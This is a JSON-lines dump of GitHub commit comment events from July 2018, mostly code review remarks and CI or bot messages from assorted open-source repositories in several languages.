{"id":"7936063996","type":"CommitCommentEvent","actor":{"login":"zepinglee"},"repo":{"name":"hushidong/biblatex-gb7714-2015"},"payload":{"comment":{"id":29637908,"position":null,"line":null,"path":null,"commit_id":"d0f29781a6dc7239be8a07e85cce87595addd8aa","created_at":"2018-07-09T08:12:25Z","updated_at":"2018-07-09T08:12:25Z","author_association":"NONE","body":"赞！其实我设计 entry type 的时候主要参考了 biblatex 和 [Haixing-Hu/GBT7714-2005-BibTeX-Style](https://github.com/Haixing-Hu/GBT7714-2005-BibTeX-Style)"}},"created_at":"2018-07-09T08:12:25Z"}
{"id":"7936067877","type":"CommitCommentEvent","actor":{"login":"bara86"},"repo":{"name":"db-home-system/thermostat-app"},"payload":{"comment":{"id":29637921,"position":13,"line":71,"path":"thermostat/utils.cpp","commit_id":"91e439ca59f43be59a526d461d9ba1966d81f654","created_at":"2018-07-09T08:13:15Z","updated_at":"2018-07-09T08:13:15Z","author_association":"NONE","body":"Da questa funzione non potresti direttamente tornare la `QList` e poi andarci a iterare supra senza dover fare tanti controlli? Cambia poco però mi sembra più carino."}},"created_at":"2018-07-09T08:13:15Z"}
{"id":"7936082175","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"Railcraft/Railcraft"},"payload":{"comment":{"id":29637956,"position":8,"line":98,"path":"src/main/java/mods/railcraft/common/modules/RailcraftModulePayload.java","commit_id":"43e18b7f56e76ddd8b68782166365568139384ed","created_at":"2018-07-09T08:16:14Z","updated_at":"2018-07-09T08:16:14Z","author_association":"MEMBER","body":"Should really use railcraft-style braces"}},"created_at":"2018-07-09T08:16:14Z"}
{"id":"7936085836","type":"CommitCommentEvent","actor":{"login":"lunatic-hombre"},"repo":{"name":"nmegrant/run_length_encoding"},"payload":{"comment":{"id":29637963,"position":7,"line":7,"path":"run_length_encoding.py","commit_id":"34ab95ea843e2842bd08a3f7a7664df7f01dd577","created_at":"2018-07-09T08:16:57Z","updated_at":"2018-07-09T08:16:57Z","author_association":"NONE","body":"It would be a bit more efficient to make the letter list in the for loop below."}},"created_at":"2018-07-09T08:16:57Z"}
{"id":"7936086986","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":29637967,"position":null,"line":null,"path":null,"commit_id":"3f2c5c19716fda9052df20fab8c34be5b75bab95","created_at":"2018-07-09T08:17:12Z","updated_at":"2018-07-09T08:17:12Z","author_association":"NONE","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2018-07-09T08:17:12Z"}
{"id":"7936087991","type":"CommitCommentEvent","actor":{"login":"bara86"},"repo":{"name":"db-home-system/thermostat-app"},"payload":{"comment":{"id":29637971,"position":117,"line":169,"path":"thermostat/thermostat.cpp","commit_id":"91e439ca59f43be59a526d461d9ba1966d81f654","created_at":"2018-07-09T08:17:24Z","updated_at":"2018-07-09T08:17:24Z","author_association":"NONE","body":"Per il `type` del dato io sarei più per usare un `enum` così sei anche sicuro che nel codice non stai scrivendo una stringa sbagliata quando fai un confronto perché ti viene controllato in fase di compilazione. Se ti fa comodo tenerti la stringa che rappresenta il dato nel file di configurazione puoi farti una `QHas` che ti mappa da stringa contenuta nel file di configurazione a valore dell'`enum`."}},"created_at":"2018-07-09T08:17:24Z"}
{"id":"7936096070","type":"CommitCommentEvent","actor":{"login":"heikang"},"repo":{"name":"heikang/mooncake"},"payload":{"comment":{"id":29637975,"position":2,"line":2,"path":"README.md","commit_id":"f5169ddfeb2548169a7ed9bc34c03c483827b31a","created_at":"2018-07-09T08:18:57Z","updated_at":"2018-07-09T08:18:57Z","author_association":"OWNER","body":"21312"}},"created_at":"2018-07-09T08:18:57Z"}
{"id":"7936100544","type":"CommitCommentEvent","actor":{"login":"lunatic-hombre"},"repo":{"name":"nmegrant/run_length_encoding"},"payload":{"comment":{"id":29637978,"position":19,"line":19,"path":"run_length_encoding.py","commit_id":"34ab95ea843e2842bd08a3f7a7664df7f01dd577","created_at":"2018-07-09T08:19:55Z","updated_at":"2018-07-09T08:19:55Z","author_association":"NONE","body":"Could be shortened a bit\r\n```python\r\nif (char.isdigit()):\r\n    holder = holder + char\r\nelse\r\n    number_list.append(1 if holder == '' else holder)\r\n    holder = ''\r\n```"}},"created_at":"2018-07-09T08:19:55Z"}
{"id":"7936102004","type":"CommitCommentEvent","actor":{"login":"eballetbo"},"repo":{"name":"ana/lava-ci-staging"},"payload":{"comment":{"id":29637979,"position":3,"line":17,"path":"templates/usb/usb.jinja2","commit_id":"48157daf36ccb8dcbbe3b5ecc2e883b0b1d98eab","created_at":"2018-07-09T08:20:13Z","updated_at":"2018-07-09T08:20:13Z","author_association":"NONE","body":"I know this is not related to the patch, but because I looked at it, these two lines looks wrong. Shouldn't first check if the lsusb command is available and then run lsusb?"}},"created_at":"2018-07-09T08:20:13Z"}
{"id":"7936102101","type":"CommitCommentEvent","actor":{"login":"EastHierarch"},"repo":{"name":"cloudera/hue"},"payload":{"comment":{"id":29637980,"position":null,"line":null,"path":null,"commit_id":"479299c2ae54505ed572f8fd91c991b396021072","created_at":"2018-07-09T08:20:14Z","updated_at":"2018-07-09T08:20:14Z","author_association":"NONE","body":"I tried it ,but it also has no namesaces,can I use jdbc interface like hive or impala,I want to show databases only."}},"created_at":"2018-07-09T08:20:14Z"}
{"id":"7936103678","type":"CommitCommentEvent","actor":{"login":"lunatic-hombre"},"repo":{"name":"nmegrant/run_length_encoding"},"payload":{"comment":{"id":29637982,"position":22,"line":22,"path":"run_length_encoding.py","commit_id":"34ab95ea843e2842bd08a3f7a7664df7f01dd577","created_at":"2018-07-09T08:20:33Z","updated_at":"2018-07-09T08:20:33Z","author_association":"NONE","body":"Neato!"}},"created_at":"2018-07-09T08:20:33Z"}
{"id":"7936104987","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29637983,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-09T08:20:49Z","updated_at":"2018-07-09T08:20:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T08:20:49Z"}
{"id":"7936109027","type":"CommitCommentEvent","actor":{"login":"lunatic-hombre"},"repo":{"name":"nmegrant/run_length_encoding"},"payload":{"comment":{"id":29637988,"position":22,"line":22,"path":"run_length_encoding.py","commit_id":"34ab95ea843e2842bd08a3f7a7664df7f01dd577","created_at":"2018-07-09T08:21:41Z","updated_at":"2018-07-09T08:21:41Z","author_association":"NONE","body":"You can shorten this line a bit with an increment-by operator I think `decoded_string += (letter_list[x] * int(number_list[x]))`"}},"created_at":"2018-07-09T08:21:41Z"}
{"id":"7936111028","type":"CommitCommentEvent","actor":{"login":"lunatic-hombre"},"repo":{"name":"nmegrant/run_length_encoding"},"payload":{"comment":{"id":29637993,"position":25,"line":25,"path":"run_length_encoding.py","commit_id":"34ab95ea843e2842bd08a3f7a7664df7f01dd577","created_at":"2018-07-09T08:22:04Z","updated_at":"2018-07-09T08:22:04Z","author_association":"NONE","body":"get dees outta hea"}},"created_at":"2018-07-09T08:22:04Z"}
{"id":"7936117173","type":"CommitCommentEvent","actor":{"login":"lunatic-hombre"},"repo":{"name":"nmegrant/run_length_encoding"},"payload":{"comment":{"id":29638005,"position":33,"line":33,"path":"run_length_encoding.py","commit_id":"34ab95ea843e2842bd08a3f7a7664df7f01dd577","created_at":"2018-07-09T08:23:18Z","updated_at":"2018-07-09T08:23:18Z","author_association":"NONE","body":"Appears this line can be removed."}},"created_at":"2018-07-09T08:23:18Z"}
{"id":"7936144926","type":"CommitCommentEvent","actor":{"login":"EastHierarch"},"repo":{"name":"cloudera/hue"},"payload":{"comment":{"id":29638077,"position":null,"line":null,"path":null,"commit_id":"479299c2ae54505ed572f8fd91c991b396021072","created_at":"2018-07-09T08:28:50Z","updated_at":"2018-07-09T08:28:50Z","author_association":"NONE","body":"Think you very much!I got it"}},"created_at":"2018-07-09T08:28:50Z"}
{"id":"7936145156","type":"CommitCommentEvent","actor":{"login":"sebastienfi"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":29638078,"position":null,"line":null,"path":null,"commit_id":"467a027157efcb13bf5360a160c8774ebd3f2da4","created_at":"2018-07-09T08:28:53Z","updated_at":"2018-07-09T08:28:53Z","author_association":"COLLABORATOR","body":"@KyleAMathews This message appears on Unix arch (Netlify) but doesn't on Windows. The query is effectively run in Windows, the GraphQL query is located in `./src/templates/`. Shouldn't it warn and break on both arch ?"}},"created_at":"2018-07-09T08:28:53Z"}
{"id":"7936149770","type":"CommitCommentEvent","actor":{"login":"vkomenda"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29638087,"position":7,"line":141,"path":"src/agreement/mod.rs","commit_id":"81cb66a87979e28ac91f005e58d3dac9efdf8251","created_at":"2018-07-09T08:29:48Z","updated_at":"2018-07-09T08:29:48Z","author_association":"CONTRIBUTOR","body":"It isn't. The enum is only used internally. by way of `accepts_input`. I can revert this patch if it doesn't look useful."}},"created_at":"2018-07-09T08:29:48Z"}
{"id":"7936151063","type":"CommitCommentEvent","actor":{"login":"vondele"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29638092,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-09T08:30:04Z","updated_at":"2018-07-09T08:30:04Z","author_association":"OWNER","body":"@noobpwnftw can you have a look on your machine what might be causing the large number of timeouts ? Eventually bring it up with somewhat less than 384 threads ? "}},"created_at":"2018-07-09T08:30:04Z"}
{"id":"7936163721","type":"CommitCommentEvent","actor":{"login":"Kirembu"},"repo":{"name":"childhelpline/myhelpline"},"payload":{"comment":{"id":29638110,"position":21,"line":469,"path":"helpline/models.py","commit_id":"7d7b43d123ae36997ec6f02902716e6fe8bd578e","created_at":"2018-07-09T08:32:28Z","updated_at":"2018-07-09T08:32:28Z","author_association":"CONTRIBUTOR","body":"This could be better done as an integer field. Saving the number of seconds then converting it to a time format when rendering. \r\n\r\ne.g int(60) = 00:00:00"}},"created_at":"2018-07-09T08:32:28Z"}
{"id":"7936165355","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29638115,"position":null,"line":null,"path":null,"commit_id":"c58dbd8feb747d3b4c591840aefe156925739631","created_at":"2018-07-09T08:32:48Z","updated_at":"2018-07-09T08:32:48Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-organiza](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-organiza).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-organiza-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-09T08:32:48Z"}
{"id":"7936166980","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29638120,"position":27,"line":23,"path":"Dodo.Core.Test/CityDepartmentTest.cs","commit_id":"1b333e98bc06e3c6aa3c2ef43dd7c3b8a0f31c20","created_at":"2018-07-09T08:33:09Z","updated_at":"2018-07-09T08:33:09Z","author_association":"MEMBER","body":"Да"}},"created_at":"2018-07-09T08:33:09Z"}
{"id":"7936169275","type":"CommitCommentEvent","actor":{"login":"Luchanso"},"repo":{"name":"bryanrsmith/eslint-plugin-sort-class-members"},"payload":{"comment":{"id":29638125,"position":null,"line":null,"path":null,"commit_id":"310d18d597a47dcf134636a510b470c5566601fb","created_at":"2018-07-09T08:33:35Z","updated_at":"2018-07-09T08:33:35Z","author_association":"NONE","body":"Hey @freaktechnik, how it was work early? I mean string in sort function, can you explain? 😃 "}},"created_at":"2018-07-09T08:33:35Z"}
{"id":"7936173953","type":"CommitCommentEvent","actor":{"login":"freaktechnik"},"repo":{"name":"bryanrsmith/eslint-plugin-sort-class-members"},"payload":{"comment":{"id":29638131,"position":null,"line":null,"path":null,"commit_id":"310d18d597a47dcf134636a510b470c5566601fb","created_at":"2018-07-09T08:34:36Z","updated_at":"2018-07-09T08:34:36Z","author_association":"CONTRIBUTOR","body":"@Luchanso how it worked before this? Node just had some non-standard behavior, where you could specify a key to sort on (sort with no param just compares the values)."}},"created_at":"2018-07-09T08:34:36Z"}
{"id":"7936174593","type":"CommitCommentEvent","actor":{"login":"nmegrant"},"repo":{"name":"nmegrant/run_length_encoding"},"payload":{"comment":{"id":29638132,"position":25,"line":25,"path":"run_length_encoding.py","commit_id":"34ab95ea843e2842bd08a3f7a7664df7f01dd577","created_at":"2018-07-09T08:34:44Z","updated_at":"2018-07-09T08:34:44Z","author_association":"OWNER","body":"Oops"}},"created_at":"2018-07-09T08:34:44Z"}
{"id":"7936178759","type":"CommitCommentEvent","actor":{"login":"Luchanso"},"repo":{"name":"bryanrsmith/eslint-plugin-sort-class-members"},"payload":{"comment":{"id":29638137,"position":null,"line":null,"path":null,"commit_id":"310d18d597a47dcf134636a510b470c5566601fb","created_at":"2018-07-09T08:35:36Z","updated_at":"2018-07-09T08:35:36Z","author_association":"NONE","body":"@freaktechnik yeap, thanks 👍 "}},"created_at":"2018-07-09T08:35:36Z"}
{"id":"7936180766","type":"CommitCommentEvent","actor":{"login":"amaturi2525"},"repo":{"name":"amaturi2525/Hello-World"},"payload":{"comment":{"id":29638139,"position":null,"line":null,"path":null,"commit_id":"3eadc089af253d08be545c796deaf774f6d738ed","created_at":"2018-07-09T08:36:01Z","updated_at":"2018-07-09T08:36:01Z","author_association":"OWNER","body":"さんきゅー"}},"created_at":"2018-07-09T08:36:01Z"}
{"id":"7936182459","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":29638142,"position":null,"line":null,"path":null,"commit_id":"6f08c9e466da0ab5f749b6e1ea5661c7762c15c1","created_at":"2018-07-09T08:36:22Z","updated_at":"2018-07-09T08:36:22Z","author_association":"NONE","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2018-07-09T08:36:22Z"}
{"id":"7936184097","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638146,"position":4,"line":7,"path":"lib/cocoapods/installer/xcode/pods_project_generator.rb","commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T08:36:40Z","updated_at":"2018-07-09T08:36:40Z","author_association":"OWNER","body":"[CocoaPods/.travis.yml](url)"}},"created_at":"2018-07-09T08:36:40Z"}
{"id":"7936184193","type":"CommitCommentEvent","actor":{"login":"slavaGanzin"},"repo":{"name":"peteut/pyramda"},"payload":{"comment":{"id":29638148,"position":null,"line":null,"path":null,"commit_id":"9a5ab96c6b18b14dc5db56f1664a974a812a96c3","created_at":"2018-07-09T08:36:41Z","updated_at":"2018-07-09T08:36:41Z","author_association":"NONE","body":"@peteut Alain, Jack have not time to contribute to a pyramda: https://github.com/jackfirth/pyramda/pull/31#issuecomment-368761380\r\n\r\nAnd you are welcomed to contribute here: https://github.com/Rafi993/pyramda2/tree/master"}},"created_at":"2018-07-09T08:36:41Z"}
{"id":"7936186181","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29638154,"position":27,"line":23,"path":"Dodo.Core.Test/CityDepartmentTest.cs","commit_id":"1b333e98bc06e3c6aa3c2ef43dd7c3b8a0f31c20","created_at":"2018-07-09T08:37:06Z","updated_at":"2018-07-09T08:37:06Z","author_association":"MEMBER","body":"![image](https://user-images.githubusercontent.com/632533/42439752-e968d9e2-838d-11e8-97aa-ce10703e8ac2.png)\r\n"}},"created_at":"2018-07-09T08:37:06Z"}
{"id":"7936189491","type":"CommitCommentEvent","actor":{"login":"lmorgadodacosta"},"repo":{"name":"globalwordnet/schemas"},"payload":{"comment":{"id":29638158,"position":null,"line":null,"path":null,"commit_id":"c491180ffebc31af7889d8e7dc39fb8d6949457b","created_at":"2018-07-09T08:37:46Z","updated_at":"2018-07-09T08:37:46Z","author_association":"NONE","body":"Everything looks good. When do we plan to merge these (along with the syntactic behavior) with the master branch?  "}},"created_at":"2018-07-09T08:37:46Z"}
{"id":"7936194726","type":"CommitCommentEvent","actor":{"login":"nmegrant"},"repo":{"name":"nmegrant/run_length_encoding"},"payload":{"comment":{"id":29638163,"position":33,"line":33,"path":"run_length_encoding.py","commit_id":"34ab95ea843e2842bd08a3f7a7664df7f01dd577","created_at":"2018-07-09T08:38:47Z","updated_at":"2018-07-09T08:38:47Z","author_association":"OWNER","body":"Look at that . . ."}},"created_at":"2018-07-09T08:38:47Z"}
{"id":"7936195522","type":"CommitCommentEvent","actor":{"login":"nmegrant"},"repo":{"name":"nmegrant/run_length_encoding"},"payload":{"comment":{"id":29638164,"position":22,"line":22,"path":"run_length_encoding.py","commit_id":"34ab95ea843e2842bd08a3f7a7664df7f01dd577","created_at":"2018-07-09T08:38:57Z","updated_at":"2018-07-09T08:38:57Z","author_association":"OWNER","body":"Done!"}},"created_at":"2018-07-09T08:38:57Z"}
{"id":"7936196667","type":"CommitCommentEvent","actor":{"login":"nmegrant"},"repo":{"name":"nmegrant/run_length_encoding"},"payload":{"comment":{"id":29638168,"position":34,"line":34,"path":"run_length_encoding.py","commit_id":"34ab95ea843e2842bd08a3f7a7664df7f01dd577","created_at":"2018-07-09T08:39:12Z","updated_at":"2018-07-09T08:39:12Z","author_association":"OWNER","body":"List comprehension!"}},"created_at":"2018-07-09T08:39:12Z"}
{"id":"7936197292","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638169,"position":4,"line":7,"path":"lib/cocoapods/installer/xcode/pods_project_generator.rb","commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T08:39:20Z","updated_at":"2018-07-09T08:39:20Z","author_association":"OWNER","body":"require \r\n\r\n> `'cocoapods/installer/xcode/pods_project_generator/target_installer_helper'```"}},"created_at":"2018-07-09T08:39:20Z"}
{"id":"7936198444","type":"CommitCommentEvent","actor":{"login":"tjikkun"},"repo":{"name":"AntagonistHQ/circus"},"payload":{"comment":{"id":29638175,"position":11,"line":513,"path":"circus/arbiter.py","commit_id":"7d0c777b4cdb11e3e50d9a9d45bc357d1440fde8","created_at":"2018-07-09T08:39:34Z","updated_at":"2018-07-09T08:39:34Z","author_association":"COLLABORATOR","body":"Hmm, hoe doe ik dit dan? met `socket.fileno() for socket in watcher.sockets.values()` kun je meerdere fd's terug krijgen. Hoe voeg ik die tegelijk toe aan de lijst als ie er niet inzit en doe ik een add_handler?\r\n"}},"created_at":"2018-07-09T08:39:34Z"}
{"id":"7936198810","type":"CommitCommentEvent","actor":{"login":"nmegrant"},"repo":{"name":"nmegrant/run_length_encoding"},"payload":{"comment":{"id":29638176,"position":50,"line":50,"path":"run_length_encoding.py","commit_id":"34ab95ea843e2842bd08a3f7a7664df7f01dd577","created_at":"2018-07-09T08:39:38Z","updated_at":"2018-07-09T08:39:38Z","author_association":"OWNER","body":"That does not work in python. Haha!"}},"created_at":"2018-07-09T08:39:38Z"}
{"id":"7936201269","type":"CommitCommentEvent","actor":{"login":"grischard"},"repo":{"name":"osmlab/editor-layer-index"},"payload":{"comment":{"id":29638183,"position":null,"line":null,"path":null,"commit_id":"380df00dfb00848050037021c9d7c354d473a97e","created_at":"2018-07-09T08:40:08Z","updated_at":"2018-07-09T08:40:08Z","author_association":"COLLABORATOR","body":"Your call! How big are the \"few places\", worth creating a polygon of the difference? Otherwise, should it be removed in JOSM too?"}},"created_at":"2018-07-09T08:40:08Z"}
{"id":"7936203264","type":"CommitCommentEvent","actor":{"login":"blubber"},"repo":{"name":"AntagonistHQ/circus"},"payload":{"comment":{"id":29638186,"position":11,"line":513,"path":"circus/arbiter.py","commit_id":"7d0c777b4cdb11e3e50d9a9d45bc357d1440fde8","created_at":"2018-07-09T08:40:32Z","updated_at":"2018-07-09T08:40:32Z","author_association":"NONE","body":"Ja, ik bedoel dus combineren met de loop op r507. Nogmaals, daar wordt het niet per sé beter van, maar gewoon anders :)."}},"created_at":"2018-07-09T08:40:32Z"}
{"id":"7936204371","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638187,"position":11,"line":14,"path":"lib/cocoapods/installer/xcode/pods_project_generator.rb","commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T08:40:45Z","updated_at":"2018-07-09T08:40:45Z","author_association":"OWNER","body":"require 'cocoapods/installer/xcode/pods_project_generator/target_installer_helper'"}},"created_at":"2018-07-09T08:40:45Z"}
{"id":"7936206764","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29638193,"position":null,"line":null,"path":null,"commit_id":"87ed032038f5e1e73a6cf06aea73e635679228c5","created_at":"2018-07-09T08:41:15Z","updated_at":"2018-07-09T08:41:15Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2931 of 2931 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-87ed032038f5e1e73a6cf06aea73e635679228c5-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-87ed032038f5e1e73a6cf06aea73e635679228c5-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-09T08:41:15Z"}
{"id":"7936207541","type":"CommitCommentEvent","actor":{"login":"pmelange"},"repo":{"name":"freifunk-berlin/firmware-packages"},"payload":{"comment":{"id":29638196,"position":4,"line":27,"path":"defaults/freifunk-berlin-olsrd-defaults/uci-defaults/freifunk-berlin-olsrd-defaults","commit_id":"f49fadfda0f19283b081be92acb2bbcf785bf2bb","created_at":"2018-07-09T08:41:25Z","updated_at":"2018-07-09T08:41:25Z","author_association":"NONE","body":"On my systems, the filename is dnsmasq.cfg02411c.pid or simply dnsmasq.pid"}},"created_at":"2018-07-09T08:41:25Z"}
{"id":"7936208753","type":"CommitCommentEvent","actor":{"login":"hushidong"},"repo":{"name":"hushidong/biblatex-gb7714-2015"},"payload":{"comment":{"id":29638198,"position":null,"line":null,"path":null,"commit_id":"d0f29781a6dc7239be8a07e85cce87595addd8aa","created_at":"2018-07-09T08:41:39Z","updated_at":"2018-07-09T08:41:39Z","author_association":"OWNER","body":"哈，互相学习！统一也便于用户使用。"}},"created_at":"2018-07-09T08:41:39Z"}
{"id":"7936209529","type":"CommitCommentEvent","actor":{"login":"tomaszmichalak"},"repo":{"name":"Knotx/knotx-data-bridge"},"payload":{"comment":{"id":29638201,"position":8,"line":37,"path":"build.gradle","commit_id":"63425852e6a48b219e493db7d7bc1f85c90d31f6","created_at":"2018-07-09T08:41:49Z","updated_at":"2018-07-09T08:41:49Z","author_association":"CONTRIBUTOR","body":"This one seems to be deprecated, the `maven-publish` plugin is the prefered one."}},"created_at":"2018-07-09T08:41:49Z"}
{"id":"7936215497","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638208,"position":19,"line":66,"path":"lib/cocoapods/installer/xcode/pods_project_generator.rb","commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T08:43:02Z","updated_at":"2018-07-09T08:43:02Z","author_association":"OWNER","body":"Install targets"}},"created_at":"2018-07-09T08:43:02Z"}
{"id":"7936217605","type":"CommitCommentEvent","actor":{"login":"FNCxPro"},"repo":{"name":"qconrad/intellistar-emulator"},"payload":{"comment":{"id":29638210,"position":null,"line":null,"path":null,"commit_id":"5a7e32930f98a279ff702de4335f1ee5b5321fd0","created_at":"2018-07-09T08:43:27Z","updated_at":"2018-07-09T08:43:27Z","author_association":"CONTRIBUTOR","body":"Sorry, only reason it was there before to prevent people from not reading that far when looping was still a bad config option that was skipped"}},"created_at":"2018-07-09T08:43:27Z"}
{"id":"7936219447","type":"CommitCommentEvent","actor":{"login":"crazyqueenn"},"repo":{"name":"crazyqueenn/-"},"payload":{"comment":{"id":29638211,"position":null,"line":null,"path":null,"commit_id":"2683f3e941a02f3f7cb952f91eec5e12177a0d18","created_at":"2018-07-09T08:43:50Z","updated_at":"2018-07-09T08:43:50Z","author_association":"OWNER","body":"HHHHHHH"}},"created_at":"2018-07-09T08:43:50Z"}
{"id":"7936220257","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638212,"position":20,"line":68,"path":"lib/cocoapods/installer/xcode/pods_project_generator.rb","commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T08:44:00Z","updated_at":"2018-07-09T08:44:00Z","author_association":"OWNER","body":" @target_installation_results = install_targets"}},"created_at":"2018-07-09T08:44:00Z"}
{"id":"7936235778","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638235,"position":22,"line":68,"path":"lib/cocoapods/installer/xcode/pods_project_generator.rb","commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T08:47:04Z","updated_at":"2018-07-09T08:47:04Z","author_association":"OWNER","body":" app_hosts_by_host_key = install_app_hosts\r\n +          wire_target_dependencies(@target_installation_results, app_hosts_by_host_key)\r\n            @target_installation_results"}},"created_at":"2018-07-09T08:47:04Z"}
{"id":"7936237421","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638236,"position":23,"line":70,"path":"lib/cocoapods/installer/xcode/pods_project_generator.rb","commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T08:47:25Z","updated_at":"2018-07-09T08:47:25Z","author_association":"OWNER","body":" app_hosts_by_host_key = install_app_hosts\r\n +          wire_target_dependencies(@target_installation_results, app_hosts_by_host_key)\r\n            @target_installation_results"}},"created_at":"2018-07-09T08:47:25Z"}
{"id":"7936239921","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638245,"position":24,"line":71,"path":"lib/cocoapods/installer/xcode/pods_project_generator.rb","commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T08:47:53Z","updated_at":"2018-07-09T08:47:53Z","author_association":"OWNER","body":" app_hosts_by_host_key = install_app_hosts\r\n +          wire_target_dependencies(@target_installation_results, app_hosts_by_host_key)\r\n         "}},"created_at":"2018-07-09T08:47:53Z"}
{"id":"7936242332","type":"CommitCommentEvent","actor":{"login":"nmegrant"},"repo":{"name":"nmegrant/run_length_encoding"},"payload":{"comment":{"id":29638250,"position":19,"line":19,"path":"run_length_encoding.py","commit_id":"34ab95ea843e2842bd08a3f7a7664df7f01dd577","created_at":"2018-07-09T08:48:21Z","updated_at":"2018-07-09T08:48:21Z","author_association":"OWNER","body":"Much nicer."}},"created_at":"2018-07-09T08:48:21Z"}
